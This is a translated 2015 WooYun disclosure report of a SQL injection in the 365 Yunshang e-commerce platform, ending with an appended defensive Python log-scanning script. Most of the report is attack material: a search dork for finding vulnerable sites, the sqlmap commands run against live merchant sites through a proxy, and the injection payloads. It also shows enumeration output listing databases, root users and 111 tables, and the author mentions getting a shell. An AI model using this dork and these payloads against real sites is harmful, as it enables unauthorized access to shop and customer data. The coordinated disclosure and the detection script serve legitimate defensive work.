
Vulnerability summary

Defect ID: wooyun-2015-0132365

Title: Generic SQL injection vulnerability in the 365 Yunshang (365云商) e-commerce platform

Vendor: CNCERT (National Internet Emergency Center)

Author: xiaohe

Submitted: 2015-08-13 13:45

Fixed: 2015-09-28 16:06

Disclosed: 2015-09-28 16:06

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organisation (CNCERT) for handling

Source: http://www.wooyun.org. For questions or help, contact WooYun.



Vulnerability details

Disclosure status:

2015-08-13: Details sent to the vendor; awaiting vendor handling
2015-08-14: CNCERT has not yet been able to reach the responsible organisation; details disclosed only to the reporting agency
2015-08-24: Details disclosed to core white hats and domain experts
2015-09-03: Details disclosed to regular white hats
2015-09-13: Details disclosed to intern white hats
2015-09-28: Details disclosed to the public

Brief description:

Generic SQL injection in the 365 Yunshang platform, affecting a dozen or so merchant e-commerce sites built on it. Asking for a high Rank and a gift.

Detailed description:

First, how this vulnerability was found:
inurl:cart.jsp?id=
The very first result is "Shopping cart - 365 Yunshang platform", so it clearly gets plenty of traffic. Fine, let's test it. Link:
http://**.**.**.**/site/cart.jsp?uid=10036&id=aknp2928vc38jjul
Append a single quote to uid:
http://**.**.**.**/site/cart.jsp?uid=10036'&id=aknp2928vc38jjul
The server returns a 302 and redirects to an error page whose URL carries the raw MySQL exception:
http://**.**.**.**/500.jsp?message=java.lang.Exception%3A+java.lang.Exception%3A+com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException%3A+Unknown+column+%2710036%C3%A2%E2%82%AC%CB%9C%27+in+%27where+clause%27
Looks promising; run it through sqlmap.

./sqlmap.py -u "http://**.**.**.**/site/cart.jsp?uid=10038&id=aknp2928vc38jju" --proxy="**.**.**.**:80" --user-agent="Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0" -p uid --code=200 -v 1


Parameter: uid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: uid=10038 AND 5183=5183&id=aknp2928vc38jju
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: uid=10038 AND (SELECT * FROM (SELECT(SLEEP(5)))HAKj)&id=aknp2928vc38jju
---
web application technology: Nginx
back-end DBMS: MySQL 5.0.12
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:


The platform's official site lists reference customers, so pick one merchant site at random to try. Shenzhen Ziqing Beinuo Mobile Mall (深圳市子情贝诺移动商城) also runs on this platform. URL:

http://**.**.**.**/site/prod_class.jsp?uid=1000&id=k9in3usoscp0ceql&class_id=ncsenwlauh3briek&name=%E9%B2%9C%E6%9E%9C%E8%9B%8B%E7%B3%95


Into sqlmap:

./sqlmap.py -u "http://**.**.**.**/site/prod_class.jsp?uid=1000&id=k9in3usoscp0ceql&class_id=ncsenwlauh3briek&name=%E9%B2%9C%E6%9E%9C%E8%9B%8B%E7%B3%95" --proxy="**.**.**.**:80" --user-agent="Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0" -p uid --code=200 -v 1


---
Parameter: uid (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: uid=1000 AND (SELECT 5798 FROM(SELECT COUNT(*),CONCAT(0x716b6b6271,(SELECT (ELT(5798=5798,1))),0x7170707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&id=k9in3usoscp0ceql&class_id=ncsenwlauh3briek&name=%E9%B2%9C%E6%9E%9C%E8%9B%8B%E7%B3%95
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: uid=1000 AND (SELECT * FROM (SELECT(SLEEP(5)))JDFn)&id=k9in3usoscp0ceql&class_id=ncsenwlauh3briek&name=%E9%B2%9C%E6%9E%9C%E8%9B%8B%E7%B3%95
---


Proof of vulnerability:

Enumerating databases

back-end DBMS: MySQL 5.0
available databases [7]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sakila
[*] test
[*] world
[*] yx_yunshang


Enumerating database users

database management system users [2]:
[*] 'root'@'**.**.**.**'
[*] 'root'@'localhost'


Enumerating tables

back-end DBMS: MySQL 5.0
Database: yx_yunshang
[111 tables]
+-------------------------+
| t_area |
| t_book |
| t_book_recd |
| t_brand |
| t_card |
| t_card_privilege |
| t_card_user |
| t_class |
| t_combo |
| t_combo_class |
| t_combo_delivery |
| t_combo_group |
| t_combo_order |
| t_coupon |
| t_coupon_user |
| t_delivery |
| t_dept |
| t_favorite |
| t_goods |
| t_group_buy |
| t_group_buy_item |
| t_group_buy_list |
| t_hotel_order |
| t_hotel_room |
| t_images |
| t_index_flow |
| t_list |
| t_lottery |
| t_lottery_item |
| t_lottery_record |
| t_material |
| t_material_class |
| t_news |
| t_opp |
| t_order |
| t_order_item |
| t_order_refund |
| t_page |
| t_pic |
| t_prod_flow |
| t_product |
| t_product_class |
| t_product_share_recd |
| t_ques_answer |
| t_ques_option |
| t_shake_list |
| t_site |
| t_site_page |
| t_sm_interact_recd |
| t_sms_send_recd |
| t_social_media_interact |
| t_spec |
| t_spic |
| t_staff |
| t_store |
| t_store_resource |
| t_survery |
| t_survery_ques |
| t_survery_recd |
| t_system |
| t_tickets |
| t_unit |
| t_unit_recharge_recd |
| t_user |
| t_user_buy |
| t_user_buy_use |
| t_user_msg |
| t_user_point |
| t_user_point_use |
| t_user_store |
| t_video_source |
| t_weixin_set |
| t_weixin_set_list |
| t_word |
| t_wx_msg_recive_recd |
| t_wx_reply_msg_recd |
| t_wx_right_protect_recd |
| t_wx_warn |
| t_xiaoepay_record |
| t_xiaoepay_set |
| t_yx_auction |
| t_yx_auction_order |
| t_yx_auction_record |
| t_yx_credit_record |
| t_yx_heka |
| t_yx_magazine |
| t_yx_magazine_content |
| t_yx_magazine_section |
| t_yx_margin_record |
| t_yx_meeting |
| t_yx_meeting_user |
| t_yx_promotion |
| t_yx_promotion_recd |
| t_yx_vote |
| t_yx_vote_user |
| t_yx_wprize |
| t_yx_wprize_user |
| t_zhifb_set |
| t_zhifb_set_list |
| v_auction_margin_r |
| v_card_user |
| v_coupon_user |
| v_favorite |
| v_order |
| v_order_item |
| v_product_class |
| v_product_class_s |
| v_staff |
| v_user_buy |
| v_user_buy_use |
| v_user_card |
+-------------------------+


I'm tired, so I'll stop here. With root privileges a getshell is probably possible too, but if I keep going I'm afraid I won't be able to stop. I need some quiet time, and don't ask me who "Quiet" is.

Fix recommendation:

Filter sensitive characters; the rest you already know. Asking for a high Rank and a gift.
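As a defender-side complement to the report (an added example, not part of the original write-up or the platform's code): a small log-triage script that flags the request patterns this report shows, namely a non-numeric value in the integer uid parameter, the sqlmap boolean/time/error-based signatures quoted above, a probe answered with a 302, and a 500.jsp hit whose message carries a raw JDBC exception. The log lines, IP and timestamps are constructed samples; the same "uid must be an integer" check the script applies is what the application itself should enforce before the value reaches a (parameterised) query.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed Nginx-style access-log lines modelled on the requests quoted in the
# report (IP, timestamps and sizes are placeholders, not data from the page).
SAMPLE_LOG = """\
203.0.113.5 - - [13/Aug/2015:13:40:01 +0800] "GET /site/cart.jsp?uid=10036&id=aknp2928vc38jjul HTTP/1.1" 200 5120
203.0.113.5 - - [13/Aug/2015:13:40:07 +0800] "GET /site/cart.jsp?uid=10036'&id=aknp2928vc38jjul HTTP/1.1" 302 0
203.0.113.5 - - [13/Aug/2015:13:40:07 +0800] "GET /500.jsp?message=java.lang.Exception%3A+com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException%3A+Unknown+column HTTP/1.1" 200 812
203.0.113.5 - - [13/Aug/2015:13:41:15 +0800] "GET /site/cart.jsp?uid=10038%20AND%205183%3D5183&id=aknp2928vc38jju HTTP/1.1" 200 5120
203.0.113.5 - - [13/Aug/2015:13:41:22 +0800] "GET /site/prod_class.jsp?uid=1000%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))JDFn)&id=k9in3usoscp0ceql HTTP/1.1" 200 5120
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')
NUMERIC_PARAMS = {"uid"}  # the application treats uid as an integer id
# Signatures lifted from the sqlmap payloads quoted in the report.
PAYLOAD_RE = re.compile(r"\bAND\s+\d+=\d+\b|SLEEP\s*\(|INFORMATION_SCHEMA|FLOOR\s*\(\s*RAND|\bELT\s*\(", re.I)
# A 500.jsp hit whose message carries a raw JDBC exception is a leak in its own right.
LEAK_RE = re.compile(r"java\.lang\.Exception|MySQL\w*Exception")

def analyse(line):
    """Return the finding tags for one log line ([] when nothing is suspicious)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    findings = []
    for name, values in parse_qs(url.query, keep_blank_values=True).items():
        for v in values:  # parse_qs has already URL-decoded v
            if name in NUMERIC_PARAMS and not v.isdigit():
                findings.append(f"non-numeric {name}")
            if PAYLOAD_RE.search(v):
                findings.append(f"sqli-payload in {name}")
    if findings and m.group("status") == "302":
        findings.append("probe-redirected")  # the "302 to the error page" behaviour from the report
    if url.path.endswith("/500.jsp") and LEAK_RE.search(unquote_plus(url.query)):
        findings.append("db-error-leak")
    return findings

def scan(log_text):
    """Return (target, findings) for every suspicious line in log_text."""
    out = []
    for line in log_text.splitlines():
        f = analyse(line)
        if f:
            out.append((LOG_RE.match(line).group("target"), f))
    return out

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```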

Copyright notice: please credit the source when reposting: xiaohe@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 14

Confirmed: 2015-08-14 16:05

Vendor reply:

CNVD confirms the reported situation and has notified the website's operating organisation (the software vendor) through the contact details published on the website (or through previously established handling channels).

Latest status:

None yet